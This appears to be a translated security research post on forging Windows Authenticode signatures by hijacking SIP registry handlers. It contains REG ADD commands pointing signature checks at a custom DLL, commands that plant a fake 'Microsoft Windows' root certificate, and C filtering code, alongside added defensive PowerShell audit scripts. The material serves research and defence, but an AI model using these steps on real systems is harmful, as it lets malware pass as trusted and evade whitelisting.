0x00 Preface

The previous article on Authenticode signature forgery covered forging the signature of a single file, which requires appending forged signature data to the end of that file. This time we introduce another type of signature forgery: by modifying the mechanism the system uses to obtain a file's signature, the system can be tricked into treating a normal file as if it contained signature data.

Note:

The techniques in this article come from the open-source research of Matt Graeber (@mattifestation). This article adds my own testing experience and my own understanding.

References:

specterops.io/assets/reso…

www.exploit-monday.com/2017/08/app…

drive.google.com/file/d/0B-K…

0x01 Overview

This article will introduce the following contents:

· Signature forgery method for PowerShell scripts

· Signature forgery method for PE files

· Signature forgery method for other file types

· Adding code to forge signatures only for specific files

0x02 Signature forgery method for PowerShell Scripts

The premise is that the PowerShell script must already contain a signature block (a self-generated signature is recognized as invalid). The following shows how this invalid signature is made to appear as a valid Microsoft signature.

Generate test certificate:

makecert -n "CN=Microsoft Windows Test1" -r -eku 1.3.6.1.5.5.7.3.3 -sv certtest.pvk certtest.cer
cert2spc certtest.cer certtest.spc
pvk2pfx -pvk certtest.pvk -pi 123456 -spc certtest.spc -pfx certtest.pfx -f

There is no need to register the certificate

Note:

To use makecert.exe, add -eku 1.3.6.1.5.5.7.3.3

Otherwise, the certificate cannot be used for code signing. The error is as follows:

Set-AuthenticodeSignature : Cannot sign code. The specified certificate is not suitable for code signing.

The following figure

Sign a PowerShell script:

$cert = Get-PfxCertificate certtest.pfx
Set-AuthenticodeSignature -FilePath 1.ps1 -Cert $cert

Verify the signature:

Get-AuthenticodeSignature .\1.ps1

When "UnknownError" is displayed, the file's signature is invalid.

The following figure

Modify the registry with the following commands (the SIP registrations live under OID\EncodingType 0; the GUID is the subject type for PowerShell scripts):

REG ADD "HKLM\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllVerifyIndirectData\{603BCC1F-4B59-4E08-B724-D2C6297EF351}" /v "Dll" /t REG_SZ /d "C:\test\MySIP.dll" /f
REG ADD "HKLM\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllVerifyIndirectData\{603BCC1F-4B59-4E08-B724-D2C6297EF351}" /v "FuncName" /t REG_SZ /d "AutoApproveHash" /f
REG ADD "HKLM\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllGetSignedDataMsg\{603BCC1F-4B59-4E08-B724-D2C6297EF351}" /v "Dll" /t REG_SZ /d "C:\test\MySIP.dll" /f
REG ADD "HKLM\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllGetSignedDataMsg\{603BCC1F-4B59-4E08-B724-D2C6297EF351}" /v "FuncName" /t REG_SZ /d "GetLegitMSSignature" /f

Verify again:

Get-AuthenticodeSignature .\1.ps1

If the command output shows Valid, the signature is now treated as valid.

The following figure

Note:

The same file has a different signature hash on different systems.

On Matt Graeber's test system, the signature hash of notepad.exe is AFDD80C4EBF2F61D3943F18BB566D6AA6F6E5033.

Now test on my own system: Win10 x64

Signature of notepad.exe:

Get-AuthenticodeSignature c:\windows\system32\notepad.exe
sigcheck -i C:\Windows\System32\notepad.exe

You can see that in sigcheck’s output, Thumbprint corresponds to the file signature hash, as shown below

Next, change the test system to Win7 x86

Here the EXE's signature cannot be obtained with Get-AuthenticodeSignature, because it is a catalog signature.

The following figure

But it can be obtained by sigcheck as shown below

The hash is 018b222e21fbb2952304d04d1d87f736ed46dea4

Locate the .cat file: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\ntexe.cat

.cat files are stored in ASN.1 format and cannot be read directly in Notepad; they must be decoded. An online decoder is available at:

lapo.it/asn1js/

Load the .cat file to decode it and display its full structure.

Format analysis can refer to:

support.microsoft.com/en-us/help/…

Replace the MS_cert.bin file in the PoCSubjectInterfacePackage project with this signature data and recompile.

Configure the registry as above.

Open a new CMD window and view the PowerShell script's signature:

Get-AuthenticodeSignature .\1.ps1

It shows the same hash value that sigcheck reported, as shown below.

The Authenticode signature of the PowerShell script has been forged successfully.

Intuitive understanding of the above operations:

The system's signature verification procedure is modified so that the specified catalog signature is returned as the file's own Authenticode signature.

Of course, every signed PowerShell script will now report the same signature, with hash 018b222e21fbb2952304d04d1d87f736ed46dea4. This raises a problem: it also affects normal signature verification of system files.

As you can see, forging signatures this way applies to all PowerShell scripts. Can the signature be forged for a specific PowerShell script only?

Using Matt Graeber's open-source PoCSubjectInterfacePackage project as a template, the modified version can be downloaded from:

github.com/mattifestat…

Focus on the function GetLegitMSSignature

github.com/mattifestat…

The description of the SIP_SUBJECTINFO structure passed as the pSubjectInfo parameter is here:

msdn.microsoft.com/en-us/libra…

Both pwsFileName and pwsDisplayName carry the file name, so a MessageBox can be used to confirm what the SIP receives.

Add the following code to GetLegitMSSignature:

MessageBox(NULL, pSubjectInfo->pwsFileName, pSubjectInfo->pwsDisplayName, 0);

The test successfully shows the incoming file name, as shown below.

The next idea:

Check the name of the incoming file; for a file that meets the condition, load the corresponding catalog signature, and thus forge the signature of that specific file only.

The file-filtering code is as follows (backslashes in the path must be escaped in a C string literal):

if (lstrcmpi((LPCTSTR)pSubjectInfo->pwsFileName, L"C:\\test\\cer1.ps1") == 0) {
    MessageBox(NULL, L"Get selected file", (LPCTSTR)pSubjectInfo->pwsFileName, 0);
}

The complete code can be referred to:

raw.githubusercontent.com/3gstudent/t…

If the current file is C:\test\cer1.ps1, the signature is forged; otherwise no signature is returned.

The test is shown below.

The advantage of this method is that no Authenticode signature needs to be appended to the end of the file, and the file hash does not change.

Of course, this is only a PoC; normal signature verification of system files would still have to be handled.

0x03 Method of forging signatures for PE files

The subject GUIDs for other file types are as follows:

· C689AAB8-8E78-11d0-8C47-00C04FC295EE – PE file

· DE351A43-8E59-11d0-8C47-00C04FC295EE – Catalog (.cat) file

· 9BA61D3F-E73A-11d0-8CD2-00C04FC295EE – Certificate Trust List (.ctl) file

· C689AABA-8E78-11d0-8C47-00C04FC295EE – Cabinet (.cab) file

To replace the CryptSIPDllGetSignedDataMsg and CryptSIPDllVerifyIndirectData handlers for EXE files, the commands are as follows:

REG ADD "HKLM\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllVerifyIndirectData\{C689AAB8-8E78-11D0-8C47-00C04FC295EE}" /v "Dll" /t REG_SZ /d "C:\test\MySIP.dll" /f
REG ADD "HKLM\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllVerifyIndirectData\{C689AAB8-8E78-11D0-8C47-00C04FC295EE}" /v "FuncName" /t REG_SZ /d "AutoApproveHash" /f
REG ADD "HKLM\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllGetSignedDataMsg\{C689AAB8-8E78-11D0-8C47-00C04FC295EE}" /v "Dll" /t REG_SZ /d "C:\test\MySIP.dll" /f
REG ADD "HKLM\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllGetSignedDataMsg\{C689AAB8-8E78-11D0-8C47-00C04FC295EE}" /v "FuncName" /t REG_SZ /d "GetLegitMSSignature" /f

After restarting explorer.exe, every EXE file shows a signature with hash 018b222e21fbb2952304d04d1d87f736ed46dea4.

A notable characteristic: the forged signature comes from a .cat file, yet it is displayed as an Authenticode signature and appears in the file's Properties dialog (a characteristic of Authenticode signatures, not of catalog signatures).

Similarly, modifying the original project can achieve signature forgery for specific PE files, and the method will not be described again
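As an added example (not code from the original post or from Matt Graeber's project): a PowerShell check that compares what the SIP layer reports for a PE file with what is physically in the file. The forged signature described above is served by the hijacked CryptSIPDllGetSignedDataMsg handler, so the file itself still has an empty security data directory (IMAGE_DIRECTORY_ENTRY_SECURITY); an "Authenticode" verdict for such a file is a contradiction worth investigating. It assumes Windows PowerShell 5.1 or later, where Signature objects expose SignatureType.

```powershell
# Added example, not from the original post: cross-check the SIP verdict for a
# PE file against the file's own security data directory.
function Test-PeSignatureConsistency {
    param([Parameter(Mandatory)][string]$Path)
    $bytes = [System.IO.File]::ReadAllBytes($Path)
    if ($bytes.Length -lt 0x40 -or $bytes[0] -ne 0x4D -or $bytes[1] -ne 0x5A) {
        throw "$Path is not a PE file (missing MZ header)"
    }
    # e_lfanew -> "PE\0\0", then the 20-byte file header, then the optional header
    $peOff  = [BitConverter]::ToInt32($bytes, 0x3C)
    $optOff = $peOff + 0x18
    $magic  = [BitConverter]::ToUInt16($bytes, $optOff)
    # Data directories start at optional-header offset 0x60 (PE32) or 0x70 (PE32+);
    # entry 4 (IMAGE_DIRECTORY_ENTRY_SECURITY) locates the embedded Authenticode blob
    $dirOff  = $optOff + $(if ($magic -eq 0x20B) { 0x70 } else { 0x60 }) + 4 * 8
    $secOff  = [BitConverter]::ToUInt32($bytes, $dirOff)      # a file offset, not an RVA
    $secSize = [BitConverter]::ToUInt32($bytes, $dirOff + 4)
    $embedded = ($secOff -ne 0 -and $secSize -ne 0)

    $sig = Get-AuthenticodeSignature -FilePath $Path
    [pscustomobject]@{
        Path         = $Path
        SipStatus    = $sig.Status
        SipType      = $sig.SignatureType        # None, Authenticode or Catalog
        EmbeddedBlob = $embedded
        EmbeddedSize = $secSize
        # A file with no security directory cannot carry an Authenticode signature of
        # its own; if the SIP still answers 'Authenticode', the handler registered for
        # the PE GUID is what needs auditing, not the file
        Inconsistent = ($sig.SignatureType -eq 'Authenticode' -and -not $embedded)
    }
}

# Usage: list every EXE under System32 that the SIP calls Authenticode-signed
# although nothing is embedded in the file
Get-ChildItem "$env:SystemRoot\System32\*.exe" |
    ForEach-Object { Test-PeSignatureConsistency $_.FullName } |
    Where-Object Inconsistent
```

A legitimately catalog-signed OS binary reports SipType Catalog with EmbeddedBlob False and is not flagged; only the combination Authenticode plus an empty security directory is.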

0x04 Signature forgery method for CAT file

If the signature verification process for all .cat files is replaced and a catalog is added to the security catalog database, does a PE file covered by that catalog signature also get a forged signature?

Here’s the test:

Create a new text file cat.txt with the following contents:

[CatalogHeader]
Name=makecat1.cat
[CatalogFiles]
<hash>ExeFile1=mimikatz.exe

Note:

A blank line is required at the end of the TXT file, otherwise an error will be reported in subsequent operations, indicating that the file could not be found

Use makecat.exe to generate makecat1.cat:

makecat -v cat.txt

Add forged Authenticode signature to makecat1.cat:

signtool sign /f certtest.pfx /p 123456 makecat1.cat

Note:

The certtest.pfx used here is not the one generated earlier: do not add -eku 1.3.6.1.5.5.7.3.3, otherwise verification of the EXE file's catalog signature fails.

Generate certtest.pfx as follows:

makecert -n "CN=Microsoft Windows Test1" -r -sv certtest.pvk certtest.cer
cert2spc certtest.cer certtest.spc
pvk2pfx -pvk certtest.pvk -pi 123456 -spc certtest.spc -pfx certtest.pfx -f

Here you also need to install the certificate into the Trusted Root Certification Authorities store

Administrator rights:

certmgr.exe -add -c certtest.cer -s -r localmachine root

Otherwise, an error will be reported in the subsequent signature verification, indicating that the certificate chain is not trusted

Supplement:

To delete a certificate from the Trusted Root Certification Authorities store:

(Administrator permission)

certmgr.exe -del -c -n "Windows Test1" -s -r localMachine Root

The subject GUID for .cat files is DE351A43-8E59-11d0-8C47-00C04FC295EE.

Replace the registry values:

REG ADD "HKLM\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllVerifyIndirectData\{DE351A43-8E59-11D0-8C47-00C04FC295EE}" /v "Dll" /t REG_SZ /d "C:\test\MySIP.dll" /f
REG ADD "HKLM\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllVerifyIndirectData\{DE351A43-8E59-11D0-8C47-00C04FC295EE}" /v "FuncName" /t REG_SZ /d "AutoApproveHash" /f
REG ADD "HKLM\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllGetSignedDataMsg\{DE351A43-8E59-11D0-8C47-00C04FC295EE}" /v "Dll" /t REG_SZ /d "C:\test\MySIP.dll" /f
REG ADD "HKLM\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllGetSignedDataMsg\{DE351A43-8E59-11D0-8C47-00C04FC295EE}" /v "FuncName" /t REG_SZ /d "GetLegitMSSignature" /f

After restarting explorer.exe, all .cat files show a Microsoft Windows signature.

Add makecat1.cat to your system’s security catalog database:

(Administrator permission)

signtool catdb -v makecat1.cat

In the end, the EXE file's catalog signature is unchanged and is not forged.

Conclusion: The catalog signature cannot be forged in this way

0x05 Summary

This article describes another way to exploit Authenticode signature forgery: by modifying the system’s signature retrieval mechanism, tricking the system into recognizing a normal file as containing signature data.

After the tests in these two articles, the final conclusion is that Authenticode signatures should be treated with caution: a Microsoft signature can be forged by modifying the registry or hijacking a DLL, so defense mechanisms such as whitelists should not blindly trust Authenticode-signed files.
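As an added example (not from the original post): a PowerShell audit of the SIP registrations that the REG ADD commands in sections 0x02 to 0x04 overwrite. It walks every CryptSIPDll* function key under OID\EncodingType 0 (including the WOW6432Node view used by 32-bit processes) and flags any handler whose DLL is not a Microsoft-signed file under %SystemRoot%. Assumption: because a hijacked SIP can also mislead Get-AuthenticodeSignature, the output should be compared against a known-good host or an offline hive rather than trusted on its own.

```powershell
# Added example, not from the original post: enumerate SIP handler registrations
# and flag DLLs that are not Microsoft-signed files under %SystemRoot%.
function Get-SipRegistration {
    # Registry view -> directory a bare DLL name (e.g. WINTRUST.DLL) resolves to
    $views = @{
        'HKLM:\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0'             = "$env:SystemRoot\System32"
        'HKLM:\SOFTWARE\WOW6432Node\Microsoft\Cryptography\OID\EncodingType 0' = "$env:SystemRoot\SysWOW64"
    }
    foreach ($root in $views.Keys) {
        if (-not (Test-Path $root)) { continue }
        # CryptSIPDllGetSignedDataMsg, CryptSIPDllVerifyIndirectData and the other SIP entry points
        foreach ($func in Get-ChildItem $root | Where-Object PSChildName -like 'CryptSIPDll*') {
            # One subkey per subject GUID (PE, catalog, PowerShell script, ...)
            foreach ($guidKey in Get-ChildItem $func.PSPath) {
                $p = Get-ItemProperty $guidKey.PSPath
                if (-not $p.Dll) { continue }
                $dll = [Environment]::ExpandEnvironmentVariables($p.Dll)
                if (-not (Split-Path $dll -Parent)) { $dll = Join-Path $views[$root] $dll }
                $inSystemRoot = $dll -like "$env:SystemRoot\*"
                $sig = if (Test-Path $dll) { Get-AuthenticodeSignature $dll } else { $null }
                $msSigned = $sig -and $sig.Status -eq 'Valid' -and
                            $sig.SignerCertificate.Subject -like '*Microsoft*'
                [pscustomobject]@{
                    Function    = $func.PSChildName
                    SubjectGuid = $guidKey.PSChildName
                    Dll         = $dll
                    FuncName    = $p.FuncName
                    DllExists   = [bool](Test-Path $dll)
                    # A handler outside %SystemRoot%, missing, or not Microsoft-signed is
                    # exactly what the C:\test\MySIP.dll registrations above look like
                    Suspicious  = -not ($inSystemRoot -and $msSigned)
                }
            }
        }
    }
}

# Usage: show only the registrations worth a second look
Get-SipRegistration | Where-Object Suspicious | Format-Table -AutoSize
```

Persist the full (unfiltered) output from a clean build as a baseline; a later diff of Dll or FuncName for any GUID is a stronger signal than the Suspicious flag alone, which depends on the very SIP layer being audited.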

www.4hou.com/system/7938…